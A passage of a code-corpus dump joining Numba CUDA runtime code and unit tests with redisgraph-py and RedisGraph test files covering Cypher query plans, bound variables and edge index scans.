def absent_function(*args, **kws):
msg = "runtime missing function: %s."
raise CudaRuntimeError(msg % fname)
setattr(self, fname, absent_function)
return absent_function
def get_version(self):
"""
Returns the CUDA Runtime version as a tuple (major, minor).
"""
rtver = ctypes.c_int()
self.cudaRuntimeGetVersion(ctypes.byref(rtver))
# The version is encoded as (1000 * major) + (10 * minor)
major = rtver.value // 1000
minor = (rtver.value - (major * 1000)) // 10
return (major, minor)
def is_supported_version(self):
"""
Returns True if the CUDA Runtime is a supported version.
"""
return self.get_version() in self.supported_versions
@property
def supported_versions(self):
"""A tuple of all supported CUDA toolkit versions. Versions are given in
the form ``(major_version, minor_version)``."""
if sys.platform not in ('linux', 'win32') or config.MACHINE_BITS != 64:
# Only 64-bit Linux and Windows are supported
return ()
return ((9, 2),
(10, 0), (10, 1), (10, 2),
(11, 0), (11, 1), (11, 2))
runtime = Runtime()
def get_version():
"""
Return the runtime version as a tuple of (major, minor)
"""
return runtime.get_version()
```
#### File: tests/doc_examples/test_laplace.py
```python
import unittest
from numba.cuda.testing import (CUDATestCase, skip_if_cudadevrt_missing,
skip_on_cudasim, skip_unless_cc_60)
from numba.tests.support import captured_stdout
@skip_if_cudadevrt_missing
@skip_unless_cc_60
@skip_on_cudasim("cudasim doesn't support cuda import at non-top-level")
class TestLaplace(CUDATestCase):
"""
Test simple vector addition
"""
def setUp(self):
# Prevent output from this test showing up when running the test suite
self._captured_stdout = captured_stdout()
self._captured_stdout.__enter__()
super().setUp()
def tearDown(self):
# No exception type, value, or traceback
self._captured_stdout.__exit__(None, None, None)
super().tearDown()
def test_ex_laplace(self):
# set True to regenerate the figures that
# accompany this example
plot = False
# ex_laplace.import.begin
import numpy as np
from numba import cuda
# ex_laplace.import.end
# ex_laplace.allocate.begin
# Use an odd problem size.
# This is so there can be an element truly in the "middle" for symmetry.
size = 1001
data = np.zeros(size)
# Middle element is made very hot
data[500] = 10000
buf_0 = cuda.to_device(data)
# This extra array is used for synchronization purposes
buf_1 = cuda.device_array_like(buf_0)
niter = 10000
# ex_laplace.allocate.end
if plot:
import matplotlib.pyplot as plt
fig, ax = plt.subplots(figsize=(16 * 0.66, 9 * 0.66))
plt.plot(
np.arange(len(buf_0)),
buf_0.copy_to_host(),
lw=3,
marker="*",
color='black'
)
plt.title('Initial State', fontsize=24)
plt.xlabel('Position', fontsize=24)
plt.ylabel('Temperature', fontsize=24)
ax.set_xticks(ax.get_xticks(), fontsize=16)
ax.set_yticks(ax.get_yticks(), fontsize=16)
plt.xlim(0, len(data))
plt.ylim(0, 10001)
plt.savefig('laplace_initial.svg')
# ex_laplace.kernel.begin
@cuda.jit
def solve_heat_equation(buf_0, buf_1, timesteps, k):
i = cuda.grid(1)
# Don't continue if our index is outside the domain
if i >= len(buf_0):
return
# Prepare to do a grid-wide synchronization later
grid = cuda.cg.this_grid()
for step in range(timesteps):
# Select the buffer from the previous timestep
if (step % 2) == 0:
data = buf_0
next_data = buf_1
else:
data = buf_1
next_data = buf_0
# Get the current temperature associated with this point
curr_temp = data[i]
# Apply formula from finite difference equation
if i == 0:
# Left wall is held at T = 0
next_temp = curr_temp + k * (data[i + 1] - (2 * curr_temp))
elif i == len(data) - 1:
# Right wall is held at T = 0
next_temp = curr_temp + k * (data[i - 1] - (2 * curr_temp))
else:
# Interior points are a weighted average of their neighbors
next_temp = curr_temp + k * (
data[i - 1] - (2 * curr_temp) + data[i + 1]
)
# Write new value to the next buffer
next_data[i] = next_temp
# Wait for every thread to write before moving on
grid.sync()
# ex_laplace.kernel.end
# ex_laplace.launch.begin
solve_heat_equation.forall(len(data))(
buf_0, buf_1, niter, 0.25
)
# ex_laplace.launch.end
results = buf_1.copy_to_host()
if plot:
fig, ax = plt.subplots(figsize=(16 * 0.66, 9 * 0.66))
plt.plot(
np.arange(len(results)),
results, lw=3,
marker="*",
color='black'
)
plt.title(f"T = {niter}", fontsize=24)
plt.xlabel('Position', fontsize=24)
plt.ylabel('Temperature', fontsize=24)
ax.set_xticks(ax.get_xticks(), fontsize=16)
ax.set_yticks(ax.get_yticks(), fontsize=16)
plt.ylim(0, max(results))
plt.xlim(0, len(results))
plt.savefig('laplace_final.svg')
# Integral over the domain should be equal to its initial value.
# Note that this should match the initial value of data[500] above, but
# we don't assign it to a variable because that would make the example
# code look a bit oddly verbose.
np.testing.assert_allclose(results.sum(), 10000)
if __name__ == "__main__":
unittest.main()
```
#### File: tests/doc_examples/test_montecarlo.py
```python
import unittest
from numba.cuda.testing import CUDATestCase, skip_on_cudasim
from numba.tests.support import captured_stdout
@skip_on_cudasim("cudasim doesn't support cuda import at non-top-level")
class TestMonteCarlo(CUDATestCase):
"""
Test monte-carlo integration
"""
def setUp(self):
# Prevent output from this test showing up when running the test suite
self._captured_stdout = captured_stdout()
self._captured_stdout.__enter__()
super().setUp()
def tearDown(self):
# No exception type, value, or traceback
self._captured_stdout.__exit__(None, None, None)
super().tearDown()
def test_ex_montecarlo(self):
# ex_montecarlo.import.begin
import numba
import numpy as np
from numba import cuda
from numba.cuda.random import (
create_xoroshiro128p_states,
xoroshiro128p_uniform_float32,
)
# ex_montecarlo.import.end
# ex_montecarlo.define.begin
# number of samples, higher will lead to a more accurate answer
nsamps = 1000000
# ex_montecarlo.define.end
# ex_montecarlo.kernel.begin
@cuda.jit
def mc_integrator_kernel(out, rng_states, lower_lim, upper_lim):
"""
kernel to draw random samples and evaluate the function to
be integrated at those sample values
"""
size = len(out)
gid = cuda.grid(1)
if gid < size:
# draw a sample between 0 and 1 on this thread
samp = xoroshiro128p_uniform_float32(rng_states, gid)
# normalize this sample to the limit range
samp = samp * (upper_lim - lower_lim) + lower_lim
# evaluate the function to be
# integrated at the normalized
# value of the sample
y = func(samp)
out[gid] = y
# ex_montecarlo.kernel.end
# ex_montecarlo.callfunc.begin
@cuda.reduce
def sum_reduce(a, b):
return a + b
def mc_integrate(lower_lim, upper_lim, nsamps):
"""
approximate the definite integral of `func` from
`lower_lim` to `upper_lim`
"""
out = cuda.to_device(np.zeros(nsamps, dtype="float32"))
rng_states = create_xoroshiro128p_states(nsamps, seed=42)
# jit the function for use in CUDA kernels
mc_integrator_kernel.forall(nsamps)(
out, rng_states, lower_lim, upper_lim
)
# normalization factor to convert
# to the average: (b - a)/(N - 1)
factor = (upper_lim - lower_lim) / (nsamps - 1)
return sum_reduce(out) * factor
# ex_montecarlo.callfunc.end
# ex_montecarlo.launch.begin
# define a function to integrate
@numba.jit
def func(x):
return 1.0 / x
mc_integrate(1, 2, nsamps) # array(0.6929643, dtype=float32)
mc_integrate(2, 3, nsamps) # array(0.4054021, dtype=float32)
# ex_montecarlo.launch.end
# values computed independently using maple
np.testing.assert_allclose(
mc_integrate(1, 2, nsamps), 0.69315, atol=0.001
)
np.testing.assert_allclose(
mc_integrate(2, 3, nsamps), 0.4055, atol=0.001
)
if __name__ == "__main__":
unittest.main()
```
#### File: numba/tests/test_funcdesc.py
```python
import unittest
from numba import njit
from numba.core.funcdesc import PythonFunctionDescriptor, default_mangler
from numba.core.compiler import run_frontend
from numba.core.itanium_mangler import mangle_abi_tag
class TestModule(unittest.TestCase):
def test_module_not_in_namespace(self):
""" Test of trying to run a compiled function
where the module from which the function is being compiled
doesn't exist in the namespace.
"""
filename = 'test.py'
name = 'mypackage'
code = """
def f(x):
return x
"""
objs = dict(__file__=filename, __name__=name)
compiled = compile(code, filename, 'exec')
exec(compiled, objs)
compiled_f = njit(objs['f'])
self.assertEqual(compiled_f(3), 3)
class TestFuncDescMangledName(unittest.TestCase):
def test_mangling_abi_tags(self):
"""
This is a minimal test for the abi-tags support in the mangler.
"""
def udt():
pass
# run minimal frontend to create a function descriptor
func_ir = run_frontend(udt)
typemap = {}
restype = None
calltypes = ()
mangler = default_mangler
inline = False
noalias = False
abi_tags = ("Shrubbery", "Herring")
fd = PythonFunctionDescriptor.from_specialized_function(
func_ir, typemap, restype, calltypes, mangler, inline, noalias,
abi_tags=abi_tags,
)
# mangled tag must exist in the mangled name
self.assertIn("".join([mangle_abi_tag(x) for x in abi_tags]),
fd.mangled_name)
if __name__ == '__main__':
unittest.main()
```
#### File: numba/tests/test_interpreter.py
```python
from numba import njit, objmode
from numba.core.errors import UnsupportedError
from numba.tests.support import TestCase, MemoryLeakMixin, skip_unless_py10
@njit
def sum_jit_func(
arg0=0,
arg1=0,
arg2=0,
arg3=0,
arg4=0,
arg5=0,
arg6=0,
arg7=0,
arg8=0,
arg9=0,
arg10=0,
arg11=0,
arg12=0,
arg13=0,
arg14=0,
arg15=0,
arg16=0,
arg17=0,
arg18=0,
arg19=0,
arg20=0,
arg21=0,
arg22=0,
arg23=0,
arg24=0,
arg25=0,
arg26=0,
arg27=0,
arg28=0,
arg29=0,
arg30=0,
arg31=0,
arg32=0,
arg33=0,
arg34=0,
arg35=0,
arg36=0,
arg37=0,
arg38=0,
arg39=0,
arg40=0,
arg41=0,
arg42=0,
arg43=0,
arg44=0,
arg45=0,
arg46=0,
):
return (
arg0
+ arg1
+ arg2
+ arg3
+ arg4
+ arg5
+ arg6
+ arg7
+ arg8
+ arg9
+ arg10
+ arg11
+ arg12
+ arg13
+ arg14
+ arg15
+ arg16
+ arg17
+ arg18
+ arg19
+ arg20
+ arg21
+ arg22
+ arg23
+ arg24
+ arg25
+ arg26
+ arg27
+ arg28
+ arg29
+ arg30
+ arg31
+ arg32
+ arg33
+ arg34
+ arg35
+ arg36
+ arg37
+ arg38
+ arg39
+ arg40
+ arg41
+ arg42
+ arg43
+ arg44
+ arg45
+ arg46
)
class TestCallFunctionExPeepHole(TestCase, MemoryLeakMixin):
"""
gh #7812
Tests that check a peephole optimization for Function calls
in Python 3.10. The bytecode changes when
(n_args / 2) + n_kws > 15, which moves the arguments from
the stack into a tuple and dictionary.
This peephole optimization updates the IR to use the original format.
There are different paths when n_args > 30 and n_args <= 30 and when
n_kws > 15 and n_kws <= 15.
"""
THRESHOLD_ARGS = 31
THRESHOLD_KWS = 16
def gen_func(self, n_args, n_kws):
"""
Generates a function that calls sum_jit_func
with the desired number of args and kws.
"""
param_list = [f"arg{i}" for i in range(n_args + n_kws)]
args_list = []
for i in range(n_args + n_kws):
# Call a function on every 5th argument to ensure
# we test function calls.
if i % 5 == 0:
arg_val = f"pow(arg{i}, 2)"
else:
arg_val = f"arg{i}"
args_list.append(arg_val)
total_params = ", ".join(param_list)
func_text = f"def impl({total_params}):\n"
func_text += " return sum_jit_func(\n"
for i in range(n_args):
func_text += f" {args_list[i]},\n"
for i in range(n_args, n_args + n_kws):
func_text += f" {param_list[i]}={args_list[i]},\n"
func_text += " )\n"
local_vars = {}
exec(func_text, {"sum_jit_func": sum_jit_func}, local_vars)
return local_vars["impl"]
@skip_unless_py10
def test_all_args(self):
"""
Tests calling a function when n_args > 30 and
n_kws = 0. This shouldn't use the peephole, but
it should still succeed.
"""
total_args = [i for i in range(self.THRESHOLD_ARGS)]
f = self.gen_func(self.THRESHOLD_ARGS, 0)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_all_kws(self):
"""
Tests calling a function when n_kws > 15 and
n_args = 0.
"""
total_args = [i for i in range(self.THRESHOLD_KWS)]
f = self.gen_func(0, self.THRESHOLD_KWS)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_small_args_small_kws(self):
"""
Tests calling a function when (n_args / 2) + n_kws > 15,
but n_args <= 30 and n_kws <= 15
"""
used_args = self.THRESHOLD_ARGS - 1
used_kws = self.THRESHOLD_KWS - 1
total_args = [i for i in range((used_args) + (used_kws))]
f = self.gen_func(used_args, used_kws)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_small_args_large_kws(self):
"""
Tests calling a function when (n_args / 2) + n_kws > 15,
but n_args <= 30 and n_kws > 15
"""
used_args = self.THRESHOLD_ARGS - 1
used_kws = self.THRESHOLD_KWS
total_args = [i for i in range((used_args) + (used_kws))]
f = self.gen_func(used_args, used_kws)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_large_args_small_kws(self):
"""
Tests calling a function when (n_args / 2) + n_kws > 15,
but n_args > 30 and n_kws <= 15
"""
used_args = self.THRESHOLD_ARGS
used_kws = self.THRESHOLD_KWS - 1
total_args = [i for i in range((used_args) + (used_kws))]
f = self.gen_func(used_args, used_kws)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_large_args_large_kws(self):
"""
Tests calling a function when (n_args / 2) + n_kws > 15,
but n_args > 30 and n_kws > 15
"""
used_args = self.THRESHOLD_ARGS
used_kws = self.THRESHOLD_KWS
total_args = [i for i in range((used_args) + (used_kws))]
f = self.gen_func(used_args, used_kws)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_large_kws_objmode(self):
"""
Tests calling an objectmode function with > 15 return values.
"""
def py_func():
return (
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
)
@njit
def objmode_func():
"""
Wrapper to call py_func from objmode. This tests
large kws with objmode. If the definition for the
call is not properly updated this test will fail.
"""
with objmode(
a='int64',
b='int64',
c='int64',
d='int64',
e='int64',
f='int64',
g='int64',
h='int64',
i='int64',
j='int64',
k='int64',
l='int64',
m='int64',
n='int64',
o='int64',
p='int64',
):
(
a,
b,
c,
d,
e,
f,
g,
h,
i,
j,
k,
l,
m,
n,
o,
p
) = py_func()
return (
a
+ b
+ c
+ d
+ e
+ f
+ g
+ h
+ i
+ j
+ k
+ l
+ m
+ n
+ o
+ p
)
a = sum(list(py_func()))
b = objmode_func()
self.assertEqual(a, b)
@skip_unless_py10
def test_large_args_inline_controlflow(self):
"""
Tests generating large args when one of the inputs
has inlined controlflow.
"""
def inline_func(flag):
return sum_jit_func(
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1 if flag else 2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
arg41=1,
)
with self.assertRaises(UnsupportedError) as raises:
njit()(inline_func)(False)
self.assertIn(
'You can resolve this issue by moving the control flow out',
str(raises.exception)
)
@skip_unless_py10
def test_large_args_noninlined_controlflow(self):
"""
Tests generating large args when one of the inputs
has the change suggested in the error message
for inlined control flow.
"""
def inline_func(flag):
a_val = 1 if flag else 2
return sum_jit_func(
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
a_val,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
arg41=1,
)
py_func = inline_func
cfunc = njit()(inline_func)
a = py_func(False)
b = cfunc(False)
self.assertEqual(a, b)
@skip_unless_py10
def test_all_args_inline_controlflow(self):
"""
Tests generating only large args when one of the inputs
has inlined controlflow. This requires a special check
inside peep_hole_call_function_ex_to_call_function_kw
because it usually only handles varkwargs.
"""
def inline_func(flag):
return sum_jit_func(
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1 if flag else 2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
)
with self.assertRaises(UnsupportedError) as raises:
njit()(inline_func)(False)
self.assertIn(
'You can resolve this issue by moving the control flow out',
str(raises.exception)
)
@skip_unless_py10
def test_all_args_noninlined_controlflow(self):
"""
Tests generating large args when one of the inputs
has the change suggested in the error message
for inlined control flow.
"""
def inline_func(flag):
a_val = 1 if flag else 2
return sum_jit_func(
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
a_val,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
)
py_func = inline_func
cfunc = njit()(inline_func)
a = py_func(False)
b = cfunc(False)
self.assertEqual(a, b)
@skip_unless_py10
def test_large_kws_inline_controlflow(self):
"""
Tests generating large kws when one of the inputs
has inlined controlflow.
"""
def inline_func(flag):
return sum_jit_func(
arg0=1,
arg1=1,
arg2=1,
arg3=1,
arg4=1,
arg5=1,
arg6=1,
arg7=1,
arg8=1,
arg9=1,
arg10=1,
arg11=1,
arg12=1,
arg13=1,
arg14=1,
arg15=1 if flag else 2,
)
with self.assertRaises(UnsupportedError) as raises:
njit()(inline_func)(False)
self.assertIn(
'You can resolve this issue by moving the control flow out',
str(raises.exception)
)
@skip_unless_py10
def test_large_kws_noninlined_controlflow(self):
"""
Tests generating large kws when one of the inputs
has the change suggested in the error message
for inlined control flow.
"""
def inline_func(flag):
a_val = 1 if flag else 2
return sum_jit_func(
arg0=1,
arg1=1,
arg2=1,
arg3=1,
arg4=1,
arg5=1,
arg6=1,
arg7=1,
arg8=1,
arg9=1,
arg10=1,
arg11=1,
arg12=1,
arg13=1,
arg14=1,
arg15=a_val,
)
py_func = inline_func
cfunc = njit()(inline_func)
a = py_func(False)
b = cfunc(False)
self.assertEqual(a, b)
```
#### File: numba/tests/test_unpickle_without_module.py
```python
import unittest
import pickle
import sys
import tempfile
from pathlib import Path
class TestUnpickleDeletedModule(unittest.TestCase):
def test_loading_pickle_with_no_module(self):
"""Create a module that uses Numba, import a function from it.
Then delete the module and pickle the function. The function
should load from the pickle without a problem.
Note - This is a simplified version of how Numba might be used
on a distributed system using e.g. dask distributed. With the
pickle being sent to the worker but not the original module.
"""
# Source code for temporary module we will make
source = "\n".join(
[
"from numba import vectorize",
"@vectorize(['float64(float64)'])",
"def inc1(x):",
" return x + 1",
]
)
# Create a temporary directory and add it to path.
modname = "tmp_module"
with tempfile.TemporaryDirectory() as tmp_dir:
sys.path.append(tmp_dir)
# Create tmp_module.py in there with our source code above.
filename = Path(f"{tmp_dir}/{modname}.py")
f = open(filename, "a")
f.write(source)
f.close()
# Import the temporary module before file is deleted
from tmp_module import inc1
# Remove from imported libraries
del sys.modules[modname]
# Pickle function and assert that it loads correctly
pkl = pickle.dumps(inc1)
f = pickle.loads(pkl)
self.assertEqual(f(2), 3)
``` |
{
"source": "10088/redisgraph-py",
"score": 2
} |
#### File: redisgraph-py/redisgraph/exceptions.py
```python
class VersionMismatchException(Exception):
def __init__(self, version):
self.version = version
```
#### File: tests/utils/base.py
```python
import unittest
import testtools
import mock
class TestCase(testtools.TestCase):
def setUp(self):
super(TestCase, self).setUp()
# NOTE(boris-42): Show all differences in complex objects
self.maxDiff = None
# NOTE(boris-42): Stop all mocks, to avoid hanging tests
self.addCleanup(mock.patch.stopall)
# NOTE(boris-42): testtools have old version of assertRaises
# which doesn't support usage with "with" context.
assertRaises = unittest.TestCase.assertRaises
``` |
{
"source": "10088/RedisGraph",
"score": 3
} |
#### File: tests/flow/test_bound_variables.py
```python
from common import *
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
redis_graph = None
class testBoundVariables(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, "G")
self.populate_graph()
def populate_graph(self):
global redis_graph
# Construct a graph with the form:
# (v1)-[:E]->(v2)-[:E]->(v3)
node_props = ['v1', 'v2', 'v3']
nodes = []
for idx, v in enumerate(node_props):
node = Node(label="L", properties={"val": v})
nodes.append(node)
redis_graph.add_node(node)
edge = Edge(nodes[0], "E", nodes[1])
redis_graph.add_edge(edge)
edge = Edge(nodes[1], "E", nodes[2])
redis_graph.add_edge(edge)
redis_graph.commit()
def test01_with_projected_entity(self):
query = """MATCH (a:L {val: 'v1'}) WITH a MATCH (a)-[e]->(b) RETURN b.val"""
actual_result = redis_graph.query(query)
# Verify that this query does not generate a Cartesian product.
execution_plan = redis_graph.execution_plan(query)
self.env.assertNotIn('Cartesian Product', execution_plan)
# Verify results.
expected_result = [['v2']]
self.env.assertEquals(actual_result.result_set, expected_result)
def test02_match_create_bound_variable(self):
# Extend the graph such that the new form is:
# (v1)-[:E]->(v2)-[:E]->(v3)-[:e]->(v4)
query = """MATCH (a:L {val: 'v3'}) CREATE (a)-[:E]->(b:L {val: 'v4'}) RETURN b.val"""
actual_result = redis_graph.query(query)
expected_result = [['v4']]
self.env.assertEquals(actual_result.result_set, expected_result)
self.env.assertEquals(actual_result.relationships_created, 1)
self.env.assertEquals(actual_result.nodes_created, 1)
def test03_procedure_match_bound_variable(self):
# Create a full-text index.
redis_graph.call_procedure("db.idx.fulltext.createNodeIndex", 'L', 'val')
# Project the result of scanning this index into a MATCH pattern.
query = """CALL db.idx.fulltext.queryNodes('L', 'v1') YIELD node MATCH (node)-[]->(b) RETURN b.val"""
# Verify that execution begins at the procedure call and proceeds into the traversals.
execution_plan = redis_graph.execution_plan(query)
# For the moment, we'll just verify that ProcedureCall appears later in the plan than
# its parent, Conditional Traverse.
traverse_idx = execution_plan.index("Conditional Traverse")
call_idx = execution_plan.index("ProcedureCall")
self.env.assertTrue(call_idx > traverse_idx)
# Verify the results
actual_result = redis_graph.query(query)
expected_result = [['v2']]
self.env.assertEquals(actual_result.result_set, expected_result)
def test04_projected_scanned_entity(self):
query = """MATCH (a:L {val: 'v1'}) WITH a MATCH (a), (b {val: 'v2'}) RETURN a.val, b.val"""
actual_result = redis_graph.query(query)
# Verify that this query generates exactly 2 scan ops.
execution_plan = redis_graph.execution_plan(query)
self.env.assertEquals(2, execution_plan.count('Scan'))
# Verify results.
expected_result = [['v1', 'v2']]
self.env.assertEquals(actual_result.result_set, expected_result)
```
#### File: tests/flow/test_edge_index_scans.py
```python
from common import *
people = ["Roi", "Alon", "Ailon", "Boaz", "Tal", "Omri", "Ori"]
redis_graph = None
class testEdgeByIndexScanFlow(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
def setUp(self):
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, "social")
self.populate_graph(redis_graph)
self.build_indices()
def tearDown(self):
self.env.cmd('flushall')
def populate_graph(self, redis_graph):
nodes = {}
# Create entities
node_id = 0
for p in people:
node = Node(label="person", properties={"name": p, "created_at": node_id})
redis_graph.add_node(node)
nodes[p] = node
node_id = node_id + 1
# Fully connected graph
edge_id = 0
for src in nodes:
for dest in nodes:
if src != dest:
edge = Edge(nodes[src], "knows", nodes[dest], properties={"created_at": edge_id * 2})
redis_graph.add_edge(edge)
edge = Edge(nodes[src], "friend", nodes[dest], properties={"created_at": edge_id * 2 + 1, "updated_at": edge_id * 3})
redis_graph.add_edge(edge)
edge_id = edge_id + 1
redis_graph.commit()
def build_indices(self):
global redis_graph
redis_graph.query("CREATE INDEX ON :person(age)")
redis_graph.query("CREATE INDEX FOR ()-[f:friend]-() ON (f.created_at)")
redis_graph.query("CREATE INDEX FOR ()-[f:knows]-() ON (f.created_at)")
# Validate that Cartesian products using index and label scans succeed
def test01_cartesian_product_mixed_scans(self):
query = "MATCH ()-[f:friend]->(), ()-[k:knows]->() WHERE f.created_at >= 0 RETURN f.created_at, k.created_at ORDER BY f.created_at, k.created_at"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Conditional Traverse', plan)
indexed_result = redis_graph.query(query)
query = "MATCH ()-[f:friend]->(), ()-[k:knows]->() RETURN f.created_at, k.created_at ORDER BY f.created_at, k.created_at"
plan = redis_graph.execution_plan(query)
self.env.assertNotIn('Edge By Index Scan', plan)
self.env.assertIn('Conditional Traverse', plan)
unindexed_result = redis_graph.query(query)
self.env.assertEquals(indexed_result.result_set, unindexed_result.result_set)
# Validate that Cartesian products using just index scans succeed
def test02_cartesian_product_index_scans_only(self):
query = "MATCH ()-[f:friend]->(), ()-[k:knows]->() WHERE f.created_at >= 0 AND k.created_at >= 0 RETURN f.created_at, k.created_at ORDER BY f.created_at, k.created_at"
plan = redis_graph.execution_plan(query)
# The two streams should both use index scans
self.env.assertEquals(plan.count('Edge By Index Scan'), 2)
self.env.assertNotIn('Conditional Traverse', plan)
indexed_result = redis_graph.query(query)
query = "MATCH ()-[f:friend]->(), ()-[k:knows]->() RETURN f.created_at, k.created_at ORDER BY f.created_at, k.created_at"
plan = redis_graph.execution_plan(query)
self.env.assertNotIn('Edge By Index Scan', plan)
self.env.assertIn('Conditional Traverse', plan)
unindexed_result = redis_graph.query(query)
self.env.assertEquals(indexed_result.result_set, unindexed_result.result_set)
# Validate that the appropriate bounds are respected when a Cartesian product uses the same index in two streams
def test03_cartesian_product_reused_index(self):
redis_graph.query("CREATE INDEX FOR ()-[f:friend]-() ON (f.updated_at)")
query = "MATCH ()-[a:friend]->(), ()-[b:friend]->() WHERE a.created_at >= 80 AND b.updated_at >= 120 RETURN a.created_at, b.updated_at"
plan = redis_graph.execution_plan(query)
# The two streams should both use index scans
self.env.assertEquals(plan.count('Edge By Index Scan'), 2)
self.env.assertNotIn('Conditional Traverse', plan)
expected_result = [[81, 120], [83, 120], [81, 123], [83, 123]]
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate index utilization when filtering on a numeric field with the `IN` keyword.
def test04_test_in_operator_numerics(self):
# Validate the transformation of IN to multiple OR expressions.
query = "MATCH ()-[f:friend]-() WHERE f.created_at IN [1,2,3] RETURN f"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
# Validate that nested arrays are not scanned in index.
query = "MATCH ()-[f:friend]-() WHERE f.created_at IN [[1,2],3] RETURN f"
plan = redis_graph.execution_plan(query)
self.env.assertNotIn('Edge By Index Scan', plan)
self.env.assertIn('Conditional Traverse', plan)
# Validate the transformation of IN to multiple OR, over a range.
query = "MATCH (n)-[f:friend]->() WHERE f.created_at IN range(0,30) RETURN DISTINCT n.name ORDER BY n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
expected_result = [['Ailon'], ['Alon'], ['Roi']]
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate the transformation of IN to empty index iterator.
query = "MATCH ()-[f:friend]-() WHERE f.created_at IN [] RETURN f.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
expected_result = []
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate the transformation of IN OR IN to empty index iterators.
query = "MATCH ()-[f:friend]->() WHERE f.created_at IN [] OR f.created_at IN [] RETURN f.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
expected_result = []
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate the transformation of multiple IN filters.
query = "MATCH (n)-[f:friend]->() WHERE f.created_at IN [0, 1, 2] OR f.created_at IN [14, 15, 16] RETURN n.name ORDER BY n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
expected_result = [['Alon'], ['Roi']]
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate the transformation of multiple IN filters.
query = "MATCH (n)-[f:friend]->() WHERE f.created_at IN [0, 1, 2] OR f.created_at IN [14, 15, 16] OR f.created_at IN [] RETURN n.name ORDER BY n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
def test07_index_scan_and_id(self):
query = """MATCH (n)-[f:friend]->() WHERE id(f)>=10 AND f.created_at<15 RETURN n.name ORDER BY n.name"""
plan = redis_graph.execution_plan(query)
query_result = redis_graph.query(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEqual(2, len(query_result.result_set))
expected_result = [['Alon'], ['Roi']]
self.env.assertEquals(expected_result, query_result.result_set)
# Validate placement of index scans and filter ops when not all filters can be replaced.
def test08_index_scan_multiple_filters(self):
query = "MATCH (n)-[f:friend]->() WHERE f.created_at = 31 AND NOT EXISTS(f.fakeprop) RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('Conditional Traverse', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Ailon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test09_index_scan_with_params(self):
query = "MATCH (n)-[f:friend]->() WHERE f.created_at = $time RETURN n.name"
params = {'time': 31}
plan = redis_graph.execution_plan(query, params=params)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(query, params=params)
expected_result = ["Ailon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test10_index_scan_with_param_array(self):
query = "MATCH (n)-[f:friend]->() WHERE f.created_at in $times RETURN n.name"
params = {'times': [31]}
plan = redis_graph.execution_plan(query, params=params)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(query, params=params)
expected_result = ["Ailon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test11_single_index_multiple_scans(self):
query = "MATCH (p1:person {name: 'Roi'}), (p2:person {name: 'Alon'}) MERGE (p1)-[:friend {created_at: 100}]->(p2) MERGE (p1)-[:friend {created_at: 101}]->(p2)"
plan = redis_graph.execution_plan(query)
# Two index scans should be performed.
self.env.assertEqual(plan.count("Edge By Index Scan"), 2)
query_result = redis_graph.query(query)
# Two new nodes should be created.
self.env.assertEquals(query_result.relationships_created, 2)
def test16_runtime_index_utilization(self):
# find all person nodes with age in the range 33-37
# current age (x) should be resolved at runtime
# index query should be constructed for each age value
